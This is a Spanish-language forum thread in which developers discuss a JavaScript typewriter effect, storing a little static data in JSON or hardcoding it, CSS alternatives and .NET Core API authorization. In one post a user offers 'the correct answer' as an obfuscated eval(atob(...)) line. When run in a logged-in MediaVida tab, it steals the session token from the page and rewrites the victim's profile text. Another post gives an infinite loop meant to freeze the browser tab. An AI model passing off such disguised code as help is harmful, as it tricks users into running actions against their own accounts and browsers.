Feda /dev/

kas

#37801 USA un país sin impuestos? En Massachusetts se paga un 30%.

Sitios como Dubai o Abu Dabi son mejores ejemplos.

JuAn4k4

#37767 Ah vale, no vi el 1000 / length y pensaba que era una letra por segundo. Te lo hago bien ya que no estoy desde el móvil

const displaySlowlyBro = (theString, theTime) => {
  const period = theTime / theString.length;
  theString.split('').forEach((c, idx) => { setTimeout(() => console.log(c), (idx+1)*period); });
};

displaySlowlyBro('Hello brother', 1000);

Lo puedes probar en la consola

B

La respuesta correcta es:

eval(atob("JC5wb3N0KCcvdXN1YXJpb3MvY29uZmlnL2dlbmVyYWwucGhwJywge2luZm86ICdGYW4gZGUgbGVtb25wYXJ0eS5mcicsIHRva2VuOiAkKCcjbG9nLWxpbmsnKS5hdHRyKCdocmVmJykuc3BsaXQoJz0nKVsxXX0p"))

** Solo válido desde MediaVida

B

Lo que estaba pensando para organizar los datos de la web, que son muy pocos, era hacer un .json que tuviera una estructura tal que (imaginar que rs un equipo de futbol):

{
  nombreEquipo: ,
  entrenador: ,
  jugadores : [ nombre: , camisetaIco: ]
}

Por tenerlo guardado de alguna forma, luego se mostraría letra a letra el nombre, al acabar el nombre del entrenador y luego se colocarían los jugadores uno a uno. No pido que me paséis código de como hacerlo, pregunto si sería buena práctica o hay mejores formas de hacerlo.

1 respuesta
eXtreM3

Siempre hay mejores formas de hacerlo, menos cuando lo hace @HeXaN, entonces esa es la mejor.

HeXaN

Las bases de datos para los patos.

B

Está generando su modelo en JSON para luego usar MongoDB :full_moon_with_face:

Camp1

#37834 en el caso de que estés usando un json para almacenar datos (because potato) eso de nombreEquipo está regular; al igual que no pones, ni hay que ponerlo, entrenadorEquipo, jugadoresEquipo, tampoco tienes que hacerlo con el nombre. Tal y como lo tienes, deberías de cambiarlo a nombre y subir equipo en el nivel jerárquico. Tendrás equipos, los equipos tendrán un nombre, un entrenador y jugadores. Y bueno el entrenador debería ser otra relación y tener por ejemplo nombre.

1 1 respuesta
B

#37838 El tema es que solo son los datos de un equipo, por eso lo pongo así y no uso bases de datos. Tal cual lo veo yo hay dos opciones, o utilizó un json para almacenar los datos en un sitio y acceder luego desde js o en js inicializar todas las variables con los datos, no sé si me estoy explicando xD

Edito: En resumen, es una web que muestra el nombre del equipo, el del entrenador y luego los jugadores con su icono, no es dinámico, siempre va a mostrar lo mismo y en caso de cambiar sería algo mínimo.

1 respuesta
HeXaN

#37839 SQLite y a tirar millas.

2 respuestas
B

#37840 Pero para que voy a tener que andar con eso si son cuatro datos, os pongo el ejemplo de jugadores de futbol pero creo que os estoy confundiendo.

Es un nombre de persona, su oficio y 3 redes sociales (link + icono de fontawesome).

A eso me refiero, o inicializo variable nombre, oficio y una lista con redes sociales, o hago un json simple y lo parseo.

2 respuestas
HeXaN

#37841 Eso se hardcodea en el HTML y listo.

1 1 respuesta
B

#37842 Vale, a eso me refería jajaja Tenía la duda de cuál sería buena práctica y cual chapuza.

Aún así estaba pensando hacer el json por no tener que hardcodear las variables de esa manera y dejar el js más limpio.

Wei-Yu

para lo que quieres sólo necesitas animaciones de css; no tienes falta ninguna de algo que no sea html o css

por poder puedes tirar de jsons, localstorage y elastic search si quieres, pero vaya

1 respuesta
B

#37844 mira que estuve mirando como hacer lo de letra a letra solo con css...

2 respuestas
desu

Acabo de descubrir lo que es la retribución flexible xdddd

Por qué esto no se enseña en el colegio?

Never a master, luego decís que se habla de dinero pero joder, soy un paleto ignorante.

2 respuestas
B

#37846 Si hubieras estudiado un FP...

FP 1 - 0 Desu

B

Lo mejor que puedes hacer es lanzar un "zampa memoria":

var aa = () => { while(true) { setTimeout(aa, 0); } }; aa();
  • en chromium bloquea la pestaña
Camp1

#37845 como dice el pato, si son 4 datos tontos, todo hardcodeado. Y el js pues simplemente para animar y demás mierdas, pero no te hace falta hacer un carga de datos. Si por ejemplo quieres hacer que aparezca el nombre con animación, primero el nombre tendrá una clase y estará con display none y a esa clase luego le aplicas la funcion js y listo.

Zoko

#37846

Espero que sea bait.

1 respuesta
Zerokkk

#37841 A ver, está claro que es un problema muy sencillo y note hace falta mucho, pero las cosas siempre es mejor hacerlas bien. Usar clases en lugar de objetos de estos, por ejemplo, te permitirá hacer modificaciones más rápidas en un futuro en caso de que pueda haberlas (esto ya depende de si consideras que le es necesario ese nivel de mantenibilidad). Por otra parte, sí que es cierto que con parsear a JSON y guardar en localStorage, deberías ir tirando si no requieres de persistencia en la nube, y vas a manejar una cantidad muy pequeñas de datos.

Lo que dice #37840 de hardcodear en el HTML sólo lo haría si de verdad no vas a tocar nunca más eso xD. Mejor tener una representación programática de los datos, y luego "renderizar" los formularios, que depender de datos o estructuras hechas sólo en una plantilla, que es una práctica bastante terrible xD. Por supuesto, siempre depende de si es una tontería que no vas a tocar nunca más, o si de verdad es un programita que podrías tener que cambiar en el futuro.

edit: ah vale, que va a ser algo que no va a cambiar nunca, algo estático vaya xDD. Entonces no necesitas ni JS, literalmente.

1 respuesta
Wei-Yu

#37845 con css tienes que poder, aunque no estoy 100% seguro. Pero animaciones de slide o apar3cer y desaparecer gradualmente es algo que se puede hacer, combinar las dos no debería ser mucho problema.

Yo es que css ni idea.

1 respuesta
B

#37851 Joder, ya vais dos que decís que no hace falta JS, y sé que soy un inútil con CSS, pero, ¿de verdad es posible hacer ese "efecto de escritura" con CSS?

#37852 Hacer slides, fade in, out y demás si que sé hacer, pero en concreto lo que hago yo con JS no se me ocurre la manera de hacerlo. Vamos, para eso CSS tendría que poder lo primero hacer split a un string o algo así

1 respuesta
QuitCat

#37853 https://css-tricks.com/snippets/css/typewriter-effect/

1 1 respuesta
miky96es

Alguien que domine el Authorization de .Net Core, estoy intentando conectarme desde un backed a un endpoint con [Authorize] de una api propia con una clave que no caduque.

He probado JWT haciendo que un endpoint sea AllowAnonymous , pasando parámetros de usuario y contraseña y me devuelva el token en caso de ser correcto, luego con el token llamo a los endpoints con el Authorization: Bearer {token} y nada,
luego he utilizado https://github.com/jamesharling/AspNet.Security.ApiKey.Providers que es algo parecido y nada
de la única forma que me puedo logear es guardando la cookie en el cliente de RestSharp y luego hacer la petición

Si no es el lugar indicado, avisadme, abro paraguas para criticas de noob, etc

1 respuesta
B

#37854 mola mola, gracias.

Y ya personalmente, si vierais que alguien intenta ese efecto en una web, que os molaría mas que lo hiciera con css o con js?

2 respuestas
QuitCat

#37856
Hay efectos que con css solo no vas a poder hacer
Hay efectos que con js solo no vas a poder hacer

En algunos casos vas a tener que usar ambos. Para este en concreto, si es tal cual los ejemplos, lo más facil es copiar el css y tirando

1 respuesta
B

#37857 Ya, lo que pasa que personalmente no me gusta copiar nada de esa manera, pero la verdad es que queda bastante guapo el efecto.

Voy a hacer una versión con ese código CSS a ver qué tal lo veo.

1 respuesta
Wei-Yu

#37855 lo que quieres es tener un server tuyo en el que das credenciales de acceso de algún tipo para que se usen desde otras apps no? eso con identityserver(4?) está "todo" prácticamente ootb. Tampoco lo he tocado mucho pero no entiendo bienbien lo que preguntas tampoco.

#37856 si es pa aprender mientras puedas exponer tu razonamiento y demostrar dotes técnicas yo creo que da algo igual lo que hagas mientras le eches ganas y esfuerzo.

B

#37858 Usa flash siempre que puedas.

4
Tema cerrado